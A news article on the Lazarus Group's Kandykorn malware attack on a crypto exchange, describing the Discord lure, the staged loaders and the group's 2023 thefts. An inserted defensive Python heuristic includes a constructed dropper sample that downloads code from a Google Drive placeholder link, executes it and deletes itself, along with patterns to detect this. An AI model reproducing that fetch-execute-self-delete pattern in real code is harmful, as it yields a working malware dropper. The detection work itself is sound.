Lazarus Group Cyberattack Executes New Kandykorn Malware


A recent cyber onslaught on a digital currency trading platform has been attributed to the infamous Lazarus Group, which deployed a novel and pernicious malware labeled Kandykorn.


Unveiled by Elastic Security Labs on October 31st, the Lazarus Group cyberattack employed the Kandykorn malware, marking a new chapter in the group’s nefarious operations. The attack, which traces its roots back to April 2023, bore striking resemblances to previous Lazarus Group campaigns, including their network infrastructure and operational methods.

The perpetrators, masquerading as blockchain experts, lured engineers from the unnamed exchange on a public Discord server. The engineers were enticed with a supposedly lucrative arbitrage bot, said to capitalize on price disparities across different exchanges. This bot, however, was a facade for the Kandykorn malware, cloaked under files like “config.py” and “pricetable.py.”

A Five-Stage Deployment by the Lazarus Group Cyberattack

The Lazarus Group’s intricate deployment of the ‘KANDYKORN’ malware unfolds through an elaborate five-stage sequence, culminating in a powerful tool designed for surveillance and discreet operations. The attack begins with watcher.py, a Python script within “Main.py,” which triggers a remote download of “testSpeed.py” from Google Drive; that script then self-destructs to cover its tracks.

In the next stage, “FinderTools” fetches “SUGARLOADER,” which conceals itself with a binary packer, a challenge for standard malware detection solutions. SUGARLOADER connects to a remote server and downloads the ultimate payload, KANDYKORN, which operates directly in memory, all while a binary named HLOADER mimics a legitimate Discord app.
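A defender-side triage heuristic, added here as an example and not taken from the article or from Elastic's report: it statically scans Python source for the combination the first stage above relies on (a Google Drive download, dynamic execution of fetched code, and self-deletion). The two sample scripts are constructed for illustration and are not the real watcher.py or testSpeed.py.

```python
import ast

# Constructed sample resembling the first-stage behaviour described above:
# fetch a second-stage file from Google Drive, run it, then delete itself.
SUSPICIOUS_SAMPLE = '''
import os, urllib.request
url = "https://drive.google.com/uc?export=download&id=PLACEHOLDER_ID"
urllib.request.urlretrieve(url, "testSpeed.py")
exec(open("testSpeed.py").read())
os.remove(__file__)
'''

# Constructed benign sample that should produce no findings.
BENIGN_SAMPLE = '''
import json
with open("config.json") as f:
    cfg = json.load(f)
print(cfg)
'''

def _call_name(node):
    """Return the dotted name of a Call node's function, e.g. 'os.remove'."""
    parts = []
    f = node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))

def triage(source):
    """Return a sorted list of dropper-style indicators found in Python source."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if "drive.google.com" in node.value:
                findings.add("download from Google Drive")
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in ("exec", "eval"):
                findings.add("dynamic code execution")
            # os.remove(__file__) / os.unlink(__file__): the script erases itself
            if name in ("os.remove", "os.unlink") and any(
                isinstance(a, ast.Name) and a.id == "__file__" for a in node.args
            ):
                findings.add("self-deletion")
    return sorted(findings)
```

Any one indicator alone is common in legitimate tooling; the value is in flagging files that combine all three.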

As a Remote Access Trojan, the KANDYKORN malware used in the Lazarus Group cyberattack is equipped with extensive functionalities, including file manipulation, data theft, and command execution, giving the attackers a gateway to a wide range of malevolent activities.

2023’s Spate of Crypto Hacks Tied to Lazarus Group Cyberattack

The year 2023 has seen a spate of crypto exchange infiltrations, with private-key breaches often traced back to the Lazarus Group. Noteworthy is the Stake.com hack, where the Lazarus Group’s attack led to a staggering $40 million loss. The Lazarus Group’s cyberattack patterns have been associated with almost $240 million in stolen cryptocurrencies since June, impacting various entities such as Atomic Wallet and CoinEx.

In the wake of these breaches, the United States Federal Bureau of Investigation has pinpointed the Lazarus Group as the principal agent behind these incidents, emphasizing the critical need for fortified security protocols within the crypto exchange sphere.